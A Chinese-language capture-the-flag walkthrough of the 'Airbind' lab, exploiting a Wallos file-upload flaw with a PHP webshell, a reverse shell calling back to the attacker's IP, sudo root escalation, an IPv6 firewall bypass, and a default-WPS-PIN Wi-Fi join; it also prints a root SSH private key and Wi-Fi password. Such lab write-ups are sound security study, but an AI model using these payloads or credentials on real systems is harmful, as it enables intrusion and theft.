Airbind
一看是自家路由器。。。看来机器搞错了,尝试重新导入:
依然扫不到,尝试接着搞吧!重新导入,处理器和内存翻倍,但仍然不行。。。。然后改了一手桥接发现行了!
信息搜集
端口扫描
┌──(kali💀kali)-[~/temp/Airbind]
└─$ IP=10.0.2.21
┌──(kali💀kali)-[~/temp/Airbind]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.0.2.21:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.57 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.57 (Ubuntu)
| http-title: Wallos - Subscription Tracker
|_Requested resource was login.php
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-favicon: Unknown favicon MD5: 81452C705B6AAB657F745B6FB4966367
目录扫描
┌──(kali💀kali)-[~/temp/Airbind]
└─$ feroxbuster -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -d 1 -s 200 301 302
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.4
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.0.2.21
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 301, 302]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.4
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 1
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
302 GET 0l 0w 0c http://10.0.2.21/ => login.php
301 GET 9l 28w 307c http://10.0.2.21/images => http://10.0.2.21/images/
301 GET 9l 28w 308c http://10.0.2.21/scripts => http://10.0.2.21/scripts/
301 GET 9l 28w 312c http://10.0.2.21/screenshots => http://10.0.2.21/screenshots/
301 GET 9l 28w 309c http://10.0.2.21/includes => http://10.0.2.21/includes/
301 GET 9l 28w 303c http://10.0.2.21/db => http://10.0.2.21/db/
301 GET 9l 28w 307c http://10.0.2.21/styles => http://10.0.2.21/styles/
301 GET 9l 28w 305c http://10.0.2.21/libs => http://10.0.2.21/libs/
[###>----------------] - 5m 36589/220553 27m found:8 errors:2
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_10_0_2_21-1734145306.state ...
[###>----------------] - 5m 36589/220553 27m found:8 errors:2
[###>----------------] - 5m 36575/220546 114/s http://10.0.2.21/
漏洞发现
踩点
┌──(kali💀kali)-[~/temp/Airbind]
└─$ whatweb http://$IP
http://10.0.2.21 [302 Found] Apache[2.4.57], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.57 (Ubuntu)], IP[10.0.2.21], RedirectLocation[login.php]
http://10.0.2.21/login.php [200 OK] Apache[2.4.57], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.57 (Ubuntu)], IP[10.0.2.21], PasswordField[password], Title[Wallos - Subscription Tracker]
发现了疑似框架,尝试检索一下:
得看一下版本号对不对:
┌──(kali💀kali)-[~/temp/Airbind]
└─$ curl -s http://$IP/login.php
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta name="theme-color" content="#FFFFFF"/>
<title>Wallos - Subscription Tracker</title>
<link rel="icon" type="image/png" href="images/icon/favicon.ico" sizes="16x16">
<link rel="apple-touch-icon" sizes="180x180" href="images/icon/apple-touch-icon.png">
<link rel="manifest" href="manifest.json">
<link rel="stylesheet" href="styles/login.css?v1.11.0">
<link rel="stylesheet" href="styles/barlow.css">
<link rel="stylesheet" href="styles/login-dark-theme.css?v1.11.0" id="dark-theme" disabled>
</head>
<body>
<div class="content">
<section class="container">
<header>
<img src="images/wallossolid.png" alt="Wallos Logo" title="Wallos - Subscription Tracker" /> <p>
Please login </p>
</header>
<form action="login.php" method="post">
<div class="form-group">
<label for="username">Username:</label>
<input type="text" id="username" name="username" required>
</div>
<div class="form-group">
<label for="password">Password:</label>
<input type="password" id="password" name="password" required>
</div>
<div class="form-group-inline">
<input type="checkbox" id="remember" name="remember">
<label for="remember">Stay logged in (30 days)</label>
</div>
<div class="form-group">
<input type="submit" value="Login">
</div>
</form>
</section>
</div>
</body>
</html>
发现版本号疑似1.11.0
,尝试进行利用!
文件上传漏洞利用
┌──(kali💀kali)-[~/temp/Airbind]
└─$ searchsploit -m php/webapps/51924.txt
Exploit: Wallos < 1.11.2 - File Upload RCE
URL: https://www.exploit-db.com/exploits/51924
Path: /usr/share/exploitdb/exploits/php/webapps/51924.txt
Codes: N/A
Verified: False
File Type: ASCII text
Copied to: /home/kali/temp/Airbind/51924.txt
┌──(kali💀kali)-[~/temp/Airbind]
└─$ ls
51924.txt ferox-http_10_0_2_21-1734144980.state
┌──(kali💀kali)-[~/temp/Airbind]
└─$ cat 51924.txt
# Exploit Title: Wallos - File Upload RCE (Authenticated)
# Date: 2024-03-04
# Exploit Author: sml@lacashita.com
# Vendor Homepage: https://github.com/ellite/Wallos
# Software Link: https://github.com/ellite/Wallos
# Version: < 1.11.2
# Tested on: Debian 12
Wallos allows you to upload an image/logo when you create a new subscription.
This can be bypassed to upload a malicious .php file.
POC
---
1) Log into the application.
2) Go to "New Subscription"
3) Upload Logo and choose your webshell .php
4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:
--- SNIP -----------------
POST /endpoints/subscription/add.php HTTP/1.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.44/
Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324
Origin: http://192.168.1.44
Content-Length: 7220
Connection: close
Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light
-----------------------------29251442139477260933920738324
Content-Disposition: form-data; name="name"
test
-----------------------------29251442139477260933920738324
Content-Disposition: form-data; name="logo"; filename="revshell.php"
Content-Type: image/jpeg
GIF89a;
<?php
system($_GET['cmd']);
?>
-----------------------------29251442139477260933920738324
Content-Disposition: form-data; name="logo-url"
----- SNIP -----
5) You will get the response that your file was uploaded ok:
{"status":"Success","message":"Subscription updated successfully"}
6) Your file will be located in:
http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php
弱密码
尝试按照教程进行利用一下!但是发现没有用户和密码,尝试一下弱口令,发现admin:admin
可以正常进入。
其实这一个也泄露过,但是之前没发现:
┌──(kali💀kali)-[~/temp/Airbind]
└─$ curl -s http://10.0.2.21/db/ | html2text
****** Index of /db ******
[[ICO]] Name Last_modified Size Description
===========================================================================
[[PARENTDIR]] Parent_Directory -
[[ ]] wallos.db 2024-12-14 03:05 64K
===========================================================================
Apache/2.4.57 (Ubuntu) Server at 10.0.2.21 Port 80
┌──(kali💀kali)-[~/temp/Airbind]
└─$ wget http://10.0.2.21/db/wallos.db
--2024-12-13 22:09:59-- http://10.0.2.21/db/wallos.db
Connecting to 10.0.2.21:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 65536 (64K)
Saving to: ‘wallos.db’
wallos.db 100%[====================================================================================================>] 64.00K --.-KB/s in 0.003s
2024-12-13 22:10:00 (21.1 MB/s) - ‘wallos.db’ saved [65536/65536]
┌──(kali💀kali)-[~/temp/Airbind]
└─$ sqlite3 wallos.db
SQLite version 3.45.1 2024-01-30 16:01:20
Enter ".help" for usage hints.
sqlite> .tables
categories login_tokens
currencies migrations
cycles notifications
fixer payment_methods
frequencies settings
household subscriptions
last_exchange_update user
last_update_next_payment_date
sqlite> select * from user;
1|admin|admin@localhost.com|$2y$10$2XxuEupev6gU1qWoURsIYu7XHNiy7nve9iq7H0mUX/MzFnmvbxC9S|1|0|en
查一下也是admin
.
抓包改包
先准备一个反弹shell!
┌──(kali💀kali)-[~/temp/Airbind]
└─$ vim shell.php
┌──(kali💀kali)-[~/temp/Airbind]
└─$ head shell.php
GIF89a;
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.10.103'; // You have changed this
$port = 1234; // And this
$chunk_size = 1400;
然后添加订阅!
改个包:
Content-Type: application/x-php
Content-Type: image/jpeg
然后保存一下,访问一下:
然后尝试访问激活:
但是不行,老老实实一句话吧。。。。
GIF89a;
<?php
system($_GET['cmd']);
?>
再进行尝试!
┌──(kali💀kali)-[~/temp/Airbind]
└─$ curl 'http://10.0.2.21/images/uploads/logos/1734147609-shell.php?cmd=whoami'
GIF89a;
www-data
成功,尝试反弹shell!(突然想起来失败可能是因为我的那个shell的ip填错了。。。。。于是我重新尝试了一下,发现成功了。。。。)
提权
信息搜集
(remote) www-data@ubuntu:/$ whoami;id;hostname
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ubuntu
(remote) www-data@ubuntu:/$ sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User www-data may run the following commands on ubuntu:
(ALL) NOPASSWD: ALL
(remote) www-data@ubuntu:/$ sudo su
root@ubuntu:/# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/# pwd
/
root@ubuntu:/# cd ~
root@ubuntu:~# pwd
/root
root@ubuntu:~# ls -la
total 40
drwx------ 4 root root 4096 May 21 2024 .
drwxr-xr-x 17 root root 4096 Dec 14 02:52 ..
lrwxrwxrwx 1 root root 9 Apr 2 2024 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 17 2022 .bashrc
-rw------- 1 root root 20 May 21 2024 .lesshst
drwxr-xr-x 3 root root 4096 Apr 1 2024 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rw-r--r-- 1 root root 66 May 21 2024 .selected_editor
-rw------- 1 root root 300 May 21 2024 .sqlite_history
drwx------ 2 root root 4096 Apr 2 2024 .ssh
-rwx------ 1 root root 33 Apr 2 2024 user.txt
-rw------- 1 root root 0 May 21 2024 .wpa_cli_history
但是只有一个user的flag以及私钥,先保存下来:
root@ubuntu:~/.ssh# cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
EkGwPez9XGBEUAAAALcm9vdEB1YnVudHU=
-----END OPENSSH PRIVATE KEY-----
root@ubuntu:~/.ssh# cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDOGLwLC++2wqYpp9eCUepbIJOOLLjBJ9STAaVCQn5+Vi2FNUEAn8sbE+QSNKLkbp4FjIwT0+bzEFtpxLUluvXwhgg9jLR+72PsxdFOm9hMhMciuTeDaguz7Z/4iFmqbVxWvgyBOPGXrb+FxmghmgAvPTa4XOZ2I5zX2ausP5xWiinSCkblUwjqkLAXd+IrXupZvKO3raLtWyuFDyQxZpPsdcErfSTToTIGVQrixEtquv+swKpIKon9PAk/dyzh37kuywvFhEjEkyHoH3iZPsrcwDTfh7g+lTPx+vDV5PsXJR3xcayKla4oCbA9XKY0YRAW8poYnogwsXpvkoVF7KCZ9iQYEs2OE/XBoNTs3GpWuIo3n0MZ5sx+9bysiWX+wg+rIQk5Ov7sQXvgO/Teqd4faEyuC7sO6iefuwz0NSAC70JFdqLdzE8VAyiSYRltuV/DAlZrD3jDhyrNWx6dfkZDEVsBR9JgN2tj6qY7z7Gv0U/XgNt89u+f4Kh/Qbiwv30= root@ubuntu
然后接着找:
root@ubuntu:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether dc:a1:f7:82:76:13 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.0.3.241/24 brd 10.0.3.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::dea1:f7ff:fe82:7613/64 scope link
valid_lft forever preferred_lft forever
3: wlan0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN group default qlen 1000
link/ether 02:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff
6: ap0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 42:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff
解法一:IPV6绕过iptables
详情参考:https://www.bilibili.com/video/BV1j442197dv/
┌──(kali💀kali)-[~/temp/Airbind]
└─$ ping6 -I eth0 ff02::1
ping6: Warning: source address might be selected on device other than: eth0
PING ff02::1 (ff02::1) from :: eth0: 56 data bytes
64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=1 ttl=64 time=0.025 ms
64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=1 ttl=64 time=2.10 ms
64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=2 ttl=64 time=0.031 ms
64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=2 ttl=64 time=0.806 ms
64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=3 ttl=64 time=0.034 ms
64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=3 ttl=64 time=0.742 ms
64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=4 ttl=64 time=0.034 ms
64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=4 ttl=64 time=1.08 ms
64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=5 ttl=64 time=0.034 ms
64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=5 ttl=64 time=1.33 ms
^C
--- ff02::1 ping statistics ---
5 packets transmitted, 5 received, +5 duplicates, 0% packet loss, time 4031ms
rtt min/avg/max/mdev = 0.025/0.621/2.096/0.683 ms
┌──(kali💀kali)-[~/temp/Airbind]
└─$ chmod 600 id_rsa
┌──(kali💀kali)-[~/temp/Airbind]
└─$ ssh root@fe80::99b:2e02:395e:4e6f%eth0 -i id_rsa
The authenticity of host 'fe80::99b:2e02:395e:4e6f%eth0 (fe80::99b:2e02:395e:4e6f%eth0)' can't be established.
ED25519 key fingerprint is SHA256:8cphJbastRTfWZolTBt5XJJ1GFOq9EbCLKKGghygXSo.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:33: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'fe80::99b:2e02:395e:4e6f%eth0' (ED25519) to the list of known hosts.
root@fe80::99b:2e02:395e:4e6f%eth0's password:
┌──(kali💀kali)-[~/temp/Airbind]
└─$ ls -la
total 180
drwxr-xr-x 2 kali kali 4096 Dec 13 22:55 .
drwxr-xr-x 136 kali kali 4096 Oct 9 02:52 ..
-rw-r--r-- 1 kali kali 1808 Dec 13 22:00 51924.txt
-rw-r--r-- 1 kali kali 81719 Dec 13 21:56 ferox-http_10_0_2_21-1734144980.state
-rw-r--r-- 1 kali kali 5996 Dec 13 22:01 ferox-http_10_0_2_21-1734145306.state
-rw-r--r-- 1 kali kali 61 Dec 13 22:13 hash
-rw------- 1 kali kali 2590 Dec 13 22:55 id_rsa
-rw-r--r-- 1 kali kali 565 Dec 13 22:55 id_rsa.pub
-rw-r--r-- 1 kali kali 3919 Dec 13 22:30 shell.php
-rw-r--r-- 1 kali kali 65536 Dec 13 22:05 wallos.db
┌──(kali💀kali)-[~/temp/Airbind]
└─$ chmod 600 id_rsa
┌──(kali💀kali)-[~/temp/Airbind]
└─$ ssh root@fe80::a00:27ff:fe1b:404c%eth0 -i id_rsa
The authenticity of host 'fe80::a00:27ff:fe1b:404c%eth0 (fe80::a00:27ff:fe1b:404c%eth0)' can't be established.
ED25519 key fingerprint is SHA256:La9YyHs4GERVO8XTRRw0cLh6XcInXX35Ar9OiMsXwQk.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:89: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'fe80::a00:27ff:fe1b:404c%eth0' (ED25519) to the list of known hosts.
Linux airbind 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@airbind:~# whoami;id;ls -la
root
uid=0(root) gid=0(root) groupes=0(root)
total 32
drwx------ 5 root root 4096 21 mai 2024 .
drwxr-xr-x 18 root root 4096 1 avril 2024 ..
lrwxrwxrwx 1 root root 9 9 mars 2024 .bash_history -> /dev/null
-rw-r--r-- 1 root root 571 10 avril 2021 .bashrc
drwx------ 2 root root 4096 2 avril 2024 .config
drwxr-xr-x 3 root root 4096 1 avril 2024 .local
-rw-r--r-- 1 root root 161 9 juil. 2019 .profile
-rwx------ 1 root root 33 2 avril 2024 root.txt
drwx------ 2 root root 4096 2 avril 2024 .ssh
原理大概是主机设置了一个ip的过滤,不能从一般途径进行登录,但是ipv6协议恰好可以绕过这个过滤。
从这里可以看到失败的原因可能是虚拟机内的那个wifi网卡和我本地的网卡冲突了。
方法二:作者解法
先扫描了一下这个开放的无线端口的信息。
root@ubuntu:~# iwlist wlan0 scanning
wlan0 Scan completed :
Cell 01 - Address: 02:00:00:00:01:00
Channel:7
Frequency:2.442 GHz (Channel 7)
Quality=70/70 Signal level=-30 dBm
Encryption key:on
ESSID:"TL-WR842ND"
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s
Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
Mode:Master
Extra:tsf=0006293310197962
Extra: Last beacon: 80ms ago
IE: Unknown: 000A544C2D57523834324E44
IE: Unknown: 010882848B960C121824
IE: Unknown: 030107
IE: Unknown: 2A0104
IE: Unknown: 32043048606C
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : CCMP
Pairwise Ciphers (1) : CCMP
Authentication Suites (1) : PSK
IE: Unknown: 3B025100
IE: Unknown: 7F080400400200000040
IE: Unknown: DDA90050F204104A00011010440001021041000101101200020000105300022108103B00010310470010572CF82FC95756539B16B5CFB298ABF11021000754502D4C494E4B1023000A544C2D57523834324E4410240001201042001D51514848302D36465943582D45515A52502D4C585642302D37423848531054000800010050F20400011011000A544C2D57523834324E441008000221081049000E00372A0001200106FFFFFFFFFFFF
找到了版本号,然后找到手册,查看一下默认pin码:
然后尝试使用wpa_supplicant
对无线设施进行控制,配置一下文件:
/etc/wpa_supplicant/wpa_supplicant.conf
ctrl_interface=/run/wpa_supplicant
update_config=1
进行添加:
#~/wpa_supplicant.conf
ctrl_interface=/var/run/wpa_supplicant
update_config=1
然后尝试进行在后台初始化:
root@ubuntu:~# wpa_supplicant -i wlan0 -c wpa_supplicant.conf -B
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
rfkill: Cannot get wiphy information
然后尝试进行连接:
root@ubuntu:~# wpa_cli
wpa_cli v2.10
Copyright (c) 2004-2022, Jouni Malinen <j@w1.fi> and contributors
This software may be distributed under the terms of the BSD license.
See README for more details.
Selected interface 'wlan0'
Interactive mode
> wps_pin any 55117319
55117319
<3>CTRL-EVENT-NETWORK-ADDED 0
<3>WPS-PIN-ACTIVE
<3>CTRL-EVENT-SCAN-STARTED
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE-AUTH
<3>SME: Trying to authenticate with 02:00:00:00:01:00 (SSID='TL-WR842ND' freq=2442 MHz)
<3>Trying to associate with 02:00:00:00:01:00 (SSID='TL-WR842ND' freq=2442 MHz)
<3>Associated with 02:00:00:00:01:00
<3>CTRL-EVENT-SUBNET-STATUS-UPDATE status=0
<3>CTRL-EVENT-EAP-STARTED EAP authentication started
<3>CTRL-EVENT-EAP-STATUS status='started' parameter=''
<3>CTRL-EVENT-EAP-PROPOSED-METHOD vendor=14122 method=1
<3>CTRL-EVENT-EAP-STATUS status='accept proposed method' parameter='WSC'
<3>CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected
<3>WPS-CRED-RECEIVED
<3>WPS-SUCCESS
<3>CTRL-EVENT-EAP-STATUS status='completion' parameter='failure'
<3>CTRL-EVENT-EAP-FAILURE EAP authentication failed
<3>CTRL-EVENT-DISCONNECTED bssid=02:00:00:00:01:00 reason=3 locally_generated=1
<3>CTRL-EVENT-DSCP-POLICY clear_all
<3>SME: Trying to authenticate with 02:00:00:00:01:00 (SSID='TL-WR842ND' freq=2442 MHz)
<3>Trying to associate with 02:00:00:00:01:00 (SSID='TL-WR842ND' freq=2442 MHz)
<3>Associated with 02:00:00:00:01:00
<3>CTRL-EVENT-SUBNET-STATUS-UPDATE status=0
<3>WPA: Key negotiation completed with 02:00:00:00:01:00 [PTK=CCMP GTK=CCMP]
<3>CTRL-EVENT-CONNECTED - Connection to 02:00:00:00:01:00 completed [id=0 id_str=]
发现链接上去了。
root@ubuntu:~# dhclient wlan0
root@ubuntu:~# cat wpa_supplicant.conf
ctrl_interface=/var/run/wpa_supplicant
update_config=1
network={
ssid="TL-WR842ND"
psk="leEAYAejoIDJ7pU4jykJ7kCkEh3gx1"
proto=RSN
key_mgmt=WPA-PSK
pairwise=CCMP-256 GCMP-256 CCMP GCMP
group=CCMP-256 GCMP-256 CCMP GCMP TKIP
auth_alg=OPEN
mesh_fwding=1
pbss=2
}
root@ubuntu:~# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 10.0.3.1 0.0.0.0 UG 0 0 0 eth0
10.0.3.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
192.168.10.0 0.0.0.0 255.255.255.0 U 0 0 0 wlan0
然后就是写脚本尝试利用:
#!/bin/bash
for ip in {1..255} ; do
timeout 1 bash -c "echo > /dev/tcp/192.168.10.$ip/22 2>/dev/null"
[[ $? -eq 0 ]] && echo "192.168.10.$ip UP"
done
root@ubuntu:/tmp# nano exp
root@ubuntu:/tmp# cat exp
#!/bin/bash
for ip in {1..255} ; do
timeout 1 bash -c "echo > /dev/tcp/192.168.10.$ip/22 2>/dev/null"
[[ $? -eq 0 ]] && echo "192.168.10.$ip UP"
done
root@ubuntu:/tmp# chmod +x *
root@ubuntu:/tmp# bash exp
192.168.10.1 UP
^C^C^C^C^C^C^C^C^C^C
^C^Z
[1]+ Stopped bash exp
root@ubuntu:/tmp# cd ~
root@ubuntu:~# ssh 192.168.10.
ssh: Could not resolve hostname 192.168.10.: Name or service not known
root@ubuntu:~# ssh 192.168.10.1
Linux airbind 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@airbind:~# whoami;id
root
uid=0(root) gid=0(root) groupes=0(root)
root@airbind:~# ls -la
total 32
drwx------ 5 root root 4096 21 mai 2024 .
drwxr-xr-x 18 root root 4096 1 avril 2024 ..
lrwxrwxrwx 1 root root 9 9 mars 2024 .bash_history -> /dev/null
-rw-r--r-- 1 root root 571 10 avril 2021 .bashrc
drwx------ 2 root root 4096 2 avril 2024 .config
drwxr-xr-x 3 root root 4096 1 avril 2024 .local
